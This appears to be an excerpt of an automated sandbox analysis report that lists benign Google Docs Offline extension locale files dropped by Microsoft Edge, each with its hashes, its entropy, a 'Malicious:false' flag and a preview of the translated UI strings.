                                                                                                                                                                                                                                                MD5:4717EFE4651F94EFF6ACB6653E868D1A
                                                                                                                                                                                                                                                SHA1:B8A7703152767FBE1819808876D09D9CC1C44450
                                                                                                                                                                                                                                                SHA-256:22CA9415E294D9C3EC3384B9D08CDAF5164AF73B4E4C251559E09E529C843EA6
                                                                                                                                                                                                                                                SHA-512:487EAB4938F6BC47B1D77DD47A5E2A389B94E01D29849E38E96C95CABC7BD98679451F0E22D3FEA25C045558CD69FDDB6C4FEF7C581141F1C53C4AA17578D7F7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "....... ............".. },.. "explanationofflinedisabled": {.. "message": "...... ........... ........... ............. ..... Google ....... ..........., Google ....... .......... ............. .... ...... ...... ... ............... .................... '.......... ................' .........".. },.. "explanationofflineenabled": {.. "message": "................., .......... ......... ....... ...... ..............

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\mn\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2778
                                                                                                                                                                                                                                                Entropy (8bit):3.595196082412897
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Y943BFU1LQ4HwQLQ4LQhlmVQL3QUm6H6ZgFIcwn6Rs2ShpQ3IwjGLQSJ/PYoEQj8:I43BCymz8XNcfuQDXYN2sum
                                                                                                                                                                                                                                                MD5:83E7A14B7FC60D4C66BF313C8A2BEF0B
                                                                                                                                                                                                                                                SHA1:1CCF1D79CDED5D65439266DB58480089CC110B18
                                                                                                                                                                                                                                                SHA-256:613D8751F6CC9D3FA319F4B7EA8B2BD3BED37FD077482CA825929DD7C12A69A8
                                                                                                                                                                                                                                                SHA-512:3742E24FFC4B5283E6EE496813C1BDC6835630D006E8647D427C3DE8B8E7BF814201ADF9A27BFAB3ABD130B6FEC64EBB102AC0EB8DEDFE7B63D82D3E1233305D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0428\u0418\u041d\u0418\u0419\u0413 \u04ae\u04ae\u0421\u0413\u042d\u0425"},"explanationofflinedisabled":{"message":"\u0422\u0430 \u043e\u0444\u043b\u0430\u0439\u043d \u0431\u0430\u0439\u043d\u0430. Google \u0414\u043e\u043a\u044b\u0433 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u0433\u04af\u0439\u0433\u044d\u044d\u0440 \u0430\u0448\u0438\u0433\u043b\u0430\u0445\u044b\u043d \u0442\u0443\u043b\u0434 \u0434\u0430\u0440\u0430\u0430\u0433\u0438\u0439\u043d \u0443\u0434\u0430\u0430 \u0438\u043d\u0442\u0435\u0440\u043d\u044d\u0442\u044d\u0434 \u0445\u043e\u043b\u0431\u043e\u0433\u0434\u043e\u0445\u0434\u043e\u043e Google \u0414\u043e\u043a\u044b\u043d \u043d\u04af\u04af\u0440 \u0445\u0443\u0443\u0434\u0430\u0441\u043d\u0430\u0430\u0441 \u0442\u043e\u0445\u0438\u0440\u0433\u043e\u043e \u0434\u043e\u0442\u043e\u0440\u0445 \u043e\u0444\u043b\u0430\u0439\u043d \u0441\u0438\u043d\u043a\u0438\u0439\u0433 \u0438\u0434\u044d\u0432\u0445\u0436\u04af\u04af\u043b\u043d\u0

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\mr\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1719
                                                                                                                                                                                                                                                Entropy (8bit):4.287702203591075
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:65/5EKaDMw6pEf4I5+jSksOTJqQyrFO8C:65/5EKaAw6pEf4I5+vsOVqQyFO8C
                                                                                                                                                                                                                                                MD5:3B98C4ED8874A160C3789FEAD5553CFA
                                                                                                                                                                                                                                                SHA1:5550D0EC548335293D962AAA96B6443DD8ABB9F6
                                                                                                                                                                                                                                                SHA-256:ADEB082A9C754DFD5A9D47340A3DDCC19BF9C7EFA6E629A2F1796305F1C9A66F
                                                                                                                                                                                                                                                SHA-512:5139B6C6DF9459C7B5CDC08A98348891499408CD75B46519BA3AC29E99AAAFCC5911A1DEE6C3A57E3413DBD0FAE72D7CBC676027248DCE6364377982B5CE4151
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ...".. },.. "explanationofflinedisabled": {.. "message": "...... ...... ..... ......... ....... ....... ..... Google ....... ............, Google ....... .............. .......... .. ... ..... .... ...... ......... ...... ...... ...... .... .... ....".. },.. "explanationofflineenabled": {.. "message": "...... ...... ...., ..... ...... ...... ...... .... ....... ... ..... .... .... ... .....".. },.. "extdesc": {.. "message": "..... ..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ms\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):936
                                                                                                                                                                                                                                                Entropy (8bit):4.457879437756106
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HARXIqhmemNKsE27rhdfNLChtyo2JJ/YgTgin:iIqFC7lrDfNLCIBRzn
                                                                                                                                                                                                                                                MD5:7D273824B1E22426C033FF5D8D7162B7
                                                                                                                                                                                                                                                SHA1:EADBE9DBE5519BD60458B3551BDFC36A10049DD1
                                                                                                                                                                                                                                                SHA-256:2824CF97513DC3ECC261F378BFD595AE95A5997E9D1C63F5731A58B1F8CD54F9
                                                                                                                                                                                                                                                SHA-512:E5B611BBFAB24C9924D1D5E1774925433C65C322769E1F3B116254B1E9C69B6DF1BE7828141EEBBF7524DD179875D40C1D8F29C4FB86D663B8A365C6C60421A7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "BUAT BAHARU".. },.. "explanationofflinedisabled": {.. "message": "Anda berada di luar talian. Untuk menggunakan Google Docs tanpa sambungan Internet, pergi ke tetapan di halaman utama Google Docs dan hidupkan penyegerakan luar talian apabila anda disambungkan ke Internet selepas ini.".. },.. "explanationofflineenabled": {.. "message": "Anda berada di luar talian, tetapi anda masih boleh mengedit fail yang tersedia atau buat fail baharu.".. },.. "extdesc": {.. "message": "Edit, buat dan lihat dokumen, hamparan dan pembentangan anda . kesemuanya tanpa akses Internet.".. },.. "extname": {.. "message": "Google Docs Luar Talian".. },.. "learnmore": {.. "message": "Ketahui Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit dan bekerjasama di mana-mana sahaja anda berada, dengan atau tanpa sambungan Internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\my\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3830
                                                                                                                                                                                                                                                Entropy (8bit):3.5483353063347587
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:Ya+Ivxy6ur1+j3P7Xgr5ELkpeCgygyOxONHO3pj6H57ODyOXOVp6:8Uspsj3P3ty2a66xl09
                                                                                                                                                                                                                                                MD5:342335A22F1886B8BC92008597326B24
                                                                                                                                                                                                                                                SHA1:2CB04F892E430DCD7705C02BF0A8619354515513
                                                                                                                                                                                                                                                SHA-256:243BEFBD6B67A21433DCC97DC1A728896D3A070DC20055EB04D644E1BB955FE7
                                                                                                                                                                                                                                                SHA-512:CD344D060E30242E5A4705547E807CE3CE2231EE983BB9A8AD22B3E7598A7EC87399094B04A80245AD51D039370F09D74FE54C0B0738583884A73F0C7E888AD8
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u1021\u101e\u1005\u103a \u1015\u103c\u102f\u101c\u102f\u1015\u103a\u101b\u1014\u103a"},"explanationofflinedisabled":{"message":"\u101e\u1004\u103a \u1021\u1031\u102c\u1037\u1016\u103a\u101c\u102d\u102f\u1004\u103a\u1038\u1016\u103c\u1005\u103a\u1014\u1031\u1015\u102b\u101e\u100a\u103a\u104b \u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u1019\u103e\u102f \u1019\u101b\u103e\u102d\u1018\u1032 Google Docs \u1000\u102d\u102f \u1021\u101e\u102f\u1036\u1038\u1015\u103c\u102f\u101b\u1014\u103a \u1014\u1031\u102c\u1000\u103a\u1010\u1005\u103a\u1000\u103c\u102d\u1019\u103a \u101e\u1004\u103a\u1021\u1004\u103a\u1010\u102c\u1014\u1000\u103a\u1001\u103b\u102d\u1010\u103a\u1006\u1000\u103a\u101e\u100a\u1037\u103a\u1021\u1001\u102b Google Docs \u1015\u1004\u103a\u1019\u1005\u102c\u1019\u103b\u1000\u103a\u1014\u103e\u102c\u101b\u103e\u102d \u1006\u1000\u103a\u1010\u1004\u103a\u1019\u103b\u102c\u1038\u101e\u102d\u102f\u1037\u1

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ne\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1898
                                                                                                                                                                                                                                                Entropy (8bit):4.187050294267571
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAmQ6ZSWfAx6fLMr48tE/cAbJtUZJScSIQoAfboFMiQ9pdvz48YgqG:TQ6W6MbkcAltUJxQdfbqQ9pp0gqG
                                                                                                                                                                                                                                                MD5:B1083DA5EC718D1F2F093BD3D1FB4F37
                                                                                                                                                                                                                                                SHA1:74B6F050D918448396642765DEF1AD5390AB5282
                                                                                                                                                                                                                                                SHA-256:E6ED0A023EF31705CCCBAF1E07F2B4B2279059296B5CA973D2070417BA16F790
                                                                                                                                                                                                                                                SHA-512:7102B90ABBE2C811E8EE2F1886A73B1298D4F3D5D05F0FFDB57CF78B9A49A25023A290B255BAA4895BB150B388BAFD9F8432650B8C70A1A9A75083FFFCD74F1A
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... ....... .........".. },.. "explanationofflinedisabled": {.. "message": "..... ...... .......... .... ........ .... .... Google ........ ...... .... ..... ..... ... .......... ....... .... Google ........ .......... ..... .......... .. ...... ..... .... ..... ......... .. ..........".. },.. "explanationofflineenabled": {.. "message": "..... ...... ........., .. ..... ... ... ...... ....... ....... .. .... ....... ....

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\nl\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                Entropy (8bit):4.513485418448461
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgFARCBxNBv52/fXjOXl6W6ICBxeBvMzU1CSUJAO6SFAIVIbCBhZHdb1tvz+:1HABJx4X6QDwEzlm2uGvYzKU
                                                                                                                                                                                                                                                MD5:32DF72F14BE59A9BC9777113A8B21DE6
                                                                                                                                                                                                                                                SHA1:2A8D9B9A998453144307DD0B700A76E783062AD0
                                                                                                                                                                                                                                                SHA-256:F3FE1FFCB182183B76E1B46C4463168C746A38E461FD25CA91FF2A40846F1D61
                                                                                                                                                                                                                                                SHA-512:E0966F5CCA5A8A6D91C58D716E662E892D1C3441DAA5D632E5E843839BB989F620D8AC33ED3EDBAFE18D7306B40CD0C4639E5A4E04DA2C598331DACEC2112AAD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "NIEUW MAKEN".. },.. "explanationofflinedisabled": {.. "message": "Je bent offline. Wil je Google Documenten zonder internetverbinding gebruiken, ga dan de volgende keer dat je verbinding met internet hebt naar 'Instellingen' op de homepage van Google Documenten en zet 'Offline synchronisatie' aan.".. },.. "explanationofflineenabled": {.. "message": "Je bent offline, maar je kunt nog wel beschikbare bestanden bewerken of nieuwe bestanden maken.".. },.. "extdesc": {.. "message": "Bewerk, maak en bekijk je documenten, spreadsheets en presentaties. Allemaal zonder internettoegang.".. },.. "extname": {.. "message": "Offline Documenten".. },.. "learnmore": {.. "message": "Meer informatie".. },.. "popuphelptext": {.. "message": "Overal schrijven, bewerken en samenwerken, met of zonder internetverbinding.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\nn\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):851
                                                                                                                                                                                                                                                Entropy (8bit):4.4858053753176526
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
                                                                                                                                                                                                                                                MD5:07FFBE5F24CA348723FF8C6C488ABFB8
                                                                                                                                                                                                                                                SHA1:6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
                                                                                                                                                                                                                                                SHA-256:6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
                                                                                                                                                                                                                                                SHA-512:7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\no\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):878
                                                                                                                                                                                                                                                Entropy (8bit):4.4541485835627475
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAqwwrJ6wky68uk+NILxRGJwBvDyrj9V:nwwQwky6W+NwswVyT
                                                                                                                                                                                                                                                MD5:A1744B0F53CCF889955B95108367F9C8
                                                                                                                                                                                                                                                SHA1:6A5A6771DFF13DCB4FD425ED839BA100B7123DE0
                                                                                                                                                                                                                                                SHA-256:21CEFF02B45A4BFD60D144879DFA9F427949A027DD49A3EB0E9E345BD0B7C9A8
                                                                                                                                                                                                                                                SHA-512:F55E43F14514EECB89F6727A0D3C234149609020A516B193542B5964D2536D192F40CC12D377E70C683C269A1BDCDE1C6A0E634AA84A164775CFFE776536A961
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "OPPRETT NYTT".. },.. "explanationofflinedisabled": {.. "message": "Du er uten nett. For . bruke Google Dokumenter uten internettilkobling, g. til innstillingene p. Google Dokumenter-nettsiden og sl. p. synkronisering uten nett neste gang du er koblet til Internett.".. },.. "explanationofflineenabled": {.. "message": "Du er uten nett, men du kan likevel endre tilgjengelige filer eller opprette nye.".. },.. "extdesc": {.. "message": "Rediger, opprett og se dokumentene, regnearkene og presentasjonene dine . uten nettilgang.".. },.. "extname": {.. "message": "Google Dokumenter uten nett".. },.. "learnmore": {.. "message": "Finn ut mer".. },.. "popuphelptext": {.. "message": "Skriv, rediger eller samarbeid uansett hvor du er, med eller uten internettilkobling.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\pa\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2766
                                                                                                                                                                                                                                                Entropy (8bit):3.839730779948262
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:YEH6/o0iZbNCbDMUcipdkNtQjsGKIhO9aBjj/nxt9o5nDAj3:p6wbZbEbvJ8jQkIhO9aBjb/90Ab
                                                                                                                                                                                                                                                MD5:97F769F51B83D35C260D1F8CFD7990AF
                                                                                                                                                                                                                                                SHA1:0D59A76564B0AEE31D0A074305905472F740CECA
                                                                                                                                                                                                                                                SHA-256:BBD37D41B7DE6F93948FA2437A7699D4C30A3C39E736179702F212CB36A3133C
                                                                                                                                                                                                                                                SHA-512:D91F5E2D22FC2D7F73C1F1C4AF79DB98FCFD1C7804069AE9B2348CBC729A6D2DFF7FB6F44D152B0BDABA6E0D05DFF54987E8472C081C4D39315CEC2CBC593816
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0a28\u0a35\u0a3e\u0a02 \u0a2c\u0a23\u0a3e\u0a13"},"explanationofflinedisabled":{"message":"\u0a24\u0a41\u0a38\u0a40\u0a02 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a39\u0a4b\u0964 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a15\u0a28\u0a48\u0a15\u0a36\u0a28 \u0a26\u0a47 \u0a2c\u0a3f\u0a28\u0a3e\u0a02 Google Docs \u0a28\u0a42\u0a70 \u0a35\u0a30\u0a24\u0a23 \u0a32\u0a08, \u0a05\u0a17\u0a32\u0a40 \u0a35\u0a3e\u0a30 \u0a1c\u0a26\u0a4b\u0a02 \u0a24\u0a41\u0a38\u0a40\u0a02 \u0a07\u0a70\u0a1f\u0a30\u0a28\u0a48\u0a71\u0a1f \u0a26\u0a47 \u0a28\u0a3e\u0a32 \u0a15\u0a28\u0a48\u0a15\u0a1f \u0a39\u0a4b\u0a35\u0a4b \u0a24\u0a3e\u0a02 Google Docs \u0a2e\u0a41\u0a71\u0a16 \u0a2a\u0a70\u0a28\u0a47 '\u0a24\u0a47 \u0a38\u0a48\u0a1f\u0a3f\u0a70\u0a17\u0a3e\u0a02 \u0a35\u0a3f\u0a71\u0a1a \u0a1c\u0a3e\u0a13 \u0a05\u0a24\u0a47 \u0a06\u0a2b\u0a3c\u0a32\u0a3e\u0a08\u0a28 \u0a38\u0a3f\u0a70\u0a15 \u0a28\u0a42\u0a70 \u0a1a\u0a3e\u0a32\u0a42 \u0a15\u0a30\u0a4b\u0964"},"expla

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\pl\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):978
                                                                                                                                                                                                                                                Entropy (8bit):4.879137540019932
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HApiJiRelvm3wi8QAYcbm24sK+tFJaSDD:FJMx3whxYcbNp
                                                                                                                                                                                                                                                MD5:B8D55E4E3B9619784AECA61BA15C9C0F
                                                                                                                                                                                                                                                SHA1:B4A9C9885FBEB78635957296FDDD12579FEFA033
                                                                                                                                                                                                                                                SHA-256:E00FF20437599A5C184CA0C79546CB6500171A95E5F24B9B5535E89A89D3EC3D
                                                                                                                                                                                                                                                SHA-512:266589116EEE223056391C65808255EDAE10EB6DC5C26655D96F8178A41E283B06360AB8E08AC3857D172023C4F616EF073D0BEA770A3B3DD3EE74F5FFB2296B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "UTW.RZ NOWY".. },.. "explanationofflinedisabled": {.. "message": "Jeste. offline. Aby korzysta. z Dokument.w Google bez po..czenia internetowego, otw.rz ustawienia na stronie g..wnej Dokument.w Google i w..cz synchronizacj. offline nast.pnym razem, gdy b.dziesz mie. dost.p do internetu.".. },.. "explanationofflineenabled": {.. "message": "Jeste. offline, ale nadal mo.esz edytowa. dost.pne pliki i tworzy. nowe.".. },.. "extdesc": {.. "message": "Edytuj, tw.rz i wy.wietlaj swoje dokumenty, arkusze kalkulacyjne oraz prezentacje bez konieczno.ci ..czenia si. z internetem.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Wi.cej informacji".. },.. "popuphelptext": {.. "message": "Pisz, edytuj i wsp..pracuj, gdziekolwiek jeste. . niezale.nie od tego, czy masz po..czenie z internetem.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\pt_BR\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):907
                                                                                                                                                                                                                                                Entropy (8bit):4.599411354657937
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1HASvgU30CBxNd6GwXOK1styCJ02OK9+4KbCBxed6X4LBAt4rXgUCSUuYDHIIQka:1HAcXlyCJ5+Tsz4LY4rXSw/Q+ftkC
                                                                                                                                                                                                                                                MD5:608551F7026E6BA8C0CF85D9AC11F8E3
                                                                                                                                                                                                                                                SHA1:87B017B2D4DA17E322AF6384F82B57B807628617
                                                                                                                                                                                                                                                SHA-256:A73EEA087164620FA2260D3910D3FBE302ED85F454EDB1493A4F287D42FC882F
                                                                                                                                                                                                                                                SHA-512:82F52F8591DB3C0469CC16D7CBFDBF9116F6D5B5D2AD02A3D8FA39CE1378C64C0EA80AB8509519027F71A89EB8BBF38A8702D9AD26C8E6E0F499BF7DA18BF747
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Voc. est. off-line. Para usar o Documentos Google sem conex.o com a Internet, na pr.xima vez que se conectar, acesse as configura..es na p.gina inicial do Documentos Google e ative a sincroniza..o off-line.".. },.. "explanationofflineenabled": {.. "message": "Voc. est. off-line, mas mesmo assim pode editar os arquivos dispon.veis ou criar novos arquivos.".. },.. "extdesc": {.. "message": "Edite, crie e veja seus documentos, planilhas e apresenta..es sem precisar de acesso . Internet.".. },.. "extname": {.. "message": "Documentos Google off-line".. },.. "learnmore": {.. "message": "Saiba mais".. },.. "popuphelptext": {.. "message": "Escreva, edite e colabore onde voc. estiver, com ou sem conex.o com a Internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\pt_PT\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):914
                                                                                                                                                                                                                                                Entropy (8bit):4.604761241355716
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HAcXzw8M+N0STDIjxX+qxCjKw5BKriEQFMJXkETs:zXzw0pKXbxqKw5BKri3aNY
                                                                                                                                                                                                                                                MD5:0963F2F3641A62A78B02825F6FA3941C
                                                                                                                                                                                                                                                SHA1:7E6972BEAB3D18E49857079A24FB9336BC4D2D48
                                                                                                                                                                                                                                                SHA-256:E93B8E7FB86D2F7DFAE57416BB1FB6EE0EEA25629B972A5922940F0023C85F90
                                                                                                                                                                                                                                                SHA-512:22DD42D967124DA5A2209DD05FB6AD3F5D0D2687EA956A22BA1E31C56EC09DEB53F0711CD5B24D672405358502E9D1C502659BB36CED66CAF83923B021CA0286
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CRIAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est. offline. Para utilizar o Google Docs sem uma liga..o . Internet, aceda .s defini..es na p.gina inicial do Google Docs e ative a sincroniza..o offline da pr.xima vez que estiver ligado . Internet.".. },.. "explanationofflineenabled": {.. "message": "Est. offline, mas continua a poder editar os ficheiros dispon.veis ou criar novos ficheiros.".. },.. "extdesc": {.. "message": "Edite, crie e veja os documentos, as folhas de c.lculo e as apresenta..es, tudo sem precisar de aceder . Internet.".. },.. "extname": {.. "message": "Google Docs offline".. },.. "learnmore": {.. "message": "Saber mais".. },.. "popuphelptext": {.. "message": "Escreva edite e colabore onde quer que esteja, com ou sem uma liga..o . Internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ro\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):937
                                                                                                                                                                                                                                                Entropy (8bit):4.686555713975264
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HA8dC6e6w+uFPHf2TFMMlecFpweWV4RE:pC6KvHf4plVweCx
                                                                                                                                                                                                                                                MD5:BED8332AB788098D276B448EC2B33351
                                                                                                                                                                                                                                                SHA1:6084124A2B32F386967DA980CBE79DD86742859E
                                                                                                                                                                                                                                                SHA-256:085787999D78FADFF9600C9DC5E3FF4FB4EB9BE06D6BB19DF2EEF8C284BE7B20
                                                                                                                                                                                                                                                SHA-512:22596584D10707CC1C8179ED3ABE46EF2C314CF9C3D0685921475944B8855AAB660590F8FA1CFDCE7976B4BB3BD9ABBBF053F61F1249A325FD0094E1C95692ED
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREEAZ. UN DOCUMENT".. },.. "explanationofflinedisabled": {.. "message": "E.ti offline. Pentru a utiliza Documente Google f.r. conexiune la internet, intr. .n set.rile din pagina principal. Documente Google .i activeaz. sincronizarea offline data viitoare c.nd e.ti conectat(.) la internet.".. },.. "explanationofflineenabled": {.. "message": "E.ti offline, dar po.i .nc. s. editezi fi.ierele disponibile sau s. creezi altele.".. },.. "extdesc": {.. "message": "Editeaz., creeaz. .i acceseaz. documente, foi de calcul .i prezent.ri - totul f.r. acces la internet.".. },.. "extname": {.. "message": "Documente Google Offline".. },.. "learnmore": {.. "message": "Afl. mai multe".. },.. "popuphelptext": {.. "message": "Scrie, editeaz. .i colaboreaz. oriunde ai fi, cu sau f.r. conexiune la internet.".. }..}..

                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir3952_298982013\CRX_INSTALL\_locales\ru\messages.json

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1337
                                                                                                                                                                                                                                                Entropy (8bit):4.69531415794894
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:1HABEapHTEmxUomjsfDVs8THjqBK8/hHUg41v+Lph5eFTHQ:I/VdxUomjsre8Kh4Riph5eFU
                                                                                                                                                                                                                                                MD5:51D34FE303D0C90EE409A2397FCA437D
